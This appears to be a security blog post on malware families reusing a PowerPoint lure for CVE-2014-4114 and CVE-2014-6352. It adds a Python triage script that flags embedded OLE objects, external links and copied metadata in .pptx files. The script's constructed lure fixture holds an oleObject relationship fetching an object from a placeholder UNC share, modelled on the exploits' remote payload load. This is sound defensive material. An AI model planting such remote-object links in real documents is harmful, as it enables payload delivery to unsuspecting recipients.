A week has already passed since the announcement of the CVE-2014-4114 vulnerability, and the tally of groups exploiting it has only increased.
There are even files whose metadata has remained the same, which clearly shows that they were copied from the original, as in the case of Mirtec and Cueisfry (a trojan linked to Japan-related APT attacks). The authors behind these malware families copied the PowerPoint document originally used by BlackEnergy and simply replaced the payload and the content with legitimate material found online.
Well, if another party's winning formula already works, there is no need to reinvent the wheel. Until a patch is pushed out, that is. Which brings us to Taleret, a malware family known to be behind certain Taiwanese APT attacks. After CVE-2014-4114 was patched, there was a need to improvise, and this time Taleret took a clean PowerPoint presentation and embedded its payload so that it would be executed via CVE-2014-6352, a weakness left over after the fix for CVE-2014-4114.
Although Microsoft has released a patch for CVE-2014-4114, CVE-2014-6352 has yet to be patched.
It seems that most of the content used in the malicious PowerPoint documents has been harvested from educational institutions or from R&D materials available on the Internet, which makes it quite challenging to tell them apart from the originals.
Here are some examples of both the clean documents and their malicious counterparts:
While there isn't a patch for the other vulnerability yet, if you can't tell which document is clean and which is malicious, verify any documents you receive with their sender. You can also update your antivirus signatures and check whether they are detected.
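Two of the observations above translate into cheap triage checks that do not rely on the slide content looking "wrong": whether a .pptx carries embedded objects (the `ppt/embeddings/` parts) or relationships that point outside the package, and whether its author and timestamp metadata is byte-for-byte identical to another deck's, the copy-and-replace pattern seen with Mirtec and Cueisfry. The script below is an added example, not code from the original post or its author; it parses the OOXML package with the Python standard library only. The two sample decks, the lecturer name, the timestamps and the `192.0.2.10` UNC target are all constructed placeholders, and treating "same four provenance fields" as a fingerprint is an assumption, not a rule from the post.

```python
"""Added triage example (not from the original post): surface the two indicators the
post describes in a .pptx package, embedded OLE objects and copied document metadata."""
import io
import zipfile
import xml.etree.ElementTree as ET

CORE_NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
    "dcterms": "http://purl.org/dc/terms/",
}
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
PROVENANCE_KEYS = ("creator", "lastModifiedBy", "created", "modified")


def core_properties(zf):
    """Read title/author/timestamp fields from docProps/core.xml (empty dict if the part is missing)."""
    if "docProps/core.xml" not in zf.namelist():
        return {}
    root = ET.fromstring(zf.read("docProps/core.xml"))
    props = {}
    for path in ("dc:title", "dc:creator", "cp:lastModifiedBy", "dcterms:created", "dcterms:modified"):
        el = root.find(path, CORE_NS)
        if el is not None and el.text:
            props[path.split(":")[1]] = el.text.strip()
    return props


def embedded_objects(zf):
    """Parts under ppt/embeddings/, where PowerPoint stores OLE objects and packaged files."""
    return sorted(n for n in zf.namelist() if n.startswith("ppt/embeddings/"))


def external_relationships(zf):
    """(rels part, relationship type, target) for every relationship pointing outside the package."""
    found = []
    for name in sorted(zf.namelist()):
        if not name.endswith(".rels"):
            continue
        root = ET.fromstring(zf.read(name))
        for rel in root.iter("{%s}Relationship" % REL_NS):
            if rel.get("TargetMode") == "External":
                found.append((name, rel.get("Type", "").rsplit("/", 1)[-1], rel.get("Target")))
    return found


def triage(pptx_bytes):
    """Summarise one presentation; a plain lecture deck normally has no embeddings and no external links."""
    with zipfile.ZipFile(io.BytesIO(pptx_bytes)) as zf:
        return {"core": core_properties(zf),
                "embeddings": embedded_objects(zf),
                "external": external_relationships(zf)}


def same_provenance(core_a, core_b):
    """True when two decks carry identical author and timestamp fields, the copy-and-replace
    pattern the post describes (assumption: these four fields are a sufficient fingerprint)."""
    return all(k in core_a and core_a.get(k) == core_b.get(k) for k in PROVENANCE_KEYS)


# --- constructed samples (not real documents) --------------------------------------
CORE_XML = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties"
 xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/"
 xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
 <dc:title>Lecture 3: Introduction to Materials Science</dc:title>
 <dc:creator>Constructed Lecturer</dc:creator>
 <cp:lastModifiedBy>Constructed Lecturer</cp:lastModifiedBy>
 <dcterms:created xsi:type="dcterms:W3CDTF">2013-09-02T08:15:00Z</dcterms:created>
 <dcterms:modified xsi:type="dcterms:W3CDTF">2013-09-02T09:40:00Z</dcterms:modified>
</cp:coreProperties>"""

# Slide relationships for the lure: one embedded OLE part plus one link to a UNC share.
# 192.0.2.10 is a TEST-NET placeholder, not an address from any real campaign.
LURE_SLIDE_RELS = r"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
 <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject1.bin"/>
 <Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="\\192.0.2.10\public\object.bin" TargetMode="External"/>
</Relationships>"""


def build_pptx(parts):
    """Zip a dict of part-name -> content into an in-memory package."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in parts.items():
            zf.writestr(name, data)
    return buf.getvalue()


CLEAN_PPTX = build_pptx({"docProps/core.xml": CORE_XML, "ppt/slides/slide1.xml": "<sld/>"})
LURE_PPTX = build_pptx({"docProps/core.xml": CORE_XML,  # metadata copied unchanged from the clean deck
                        "ppt/slides/slide1.xml": "<sld/>",
                        "ppt/slides/_rels/slide1.xml.rels": LURE_SLIDE_RELS,
                        # CFB header bytes only: a placeholder, not a real OLE object
                        "ppt/embeddings/oleObject1.bin": b"\xd0\xcf\x11\xe0" + b"\x00" * 28})

if __name__ == "__main__":
    clean, lure = triage(CLEAN_PPTX), triage(LURE_PPTX)
    print("clean:", clean)
    print("lure: ", lure)
    print("same provenance:", same_provenance(clean["core"], lure["core"]))
```

Run against the two constructed decks, the clean one reports no embeddings and no external relationships, while the lure reports `ppt/embeddings/oleObject1.bin` and an `oleObject` relationship to the UNC share, and `same_provenance` confirms the metadata was carried over unchanged. None of this proves a file is malicious (legitimate decks embed spreadsheets too), but a lecture deck received from an unexpected sender that embeds objects, reaches out to a network share and shares its exact creation and modification timestamps with a known lure is worth detonating in a sandbox rather than opening.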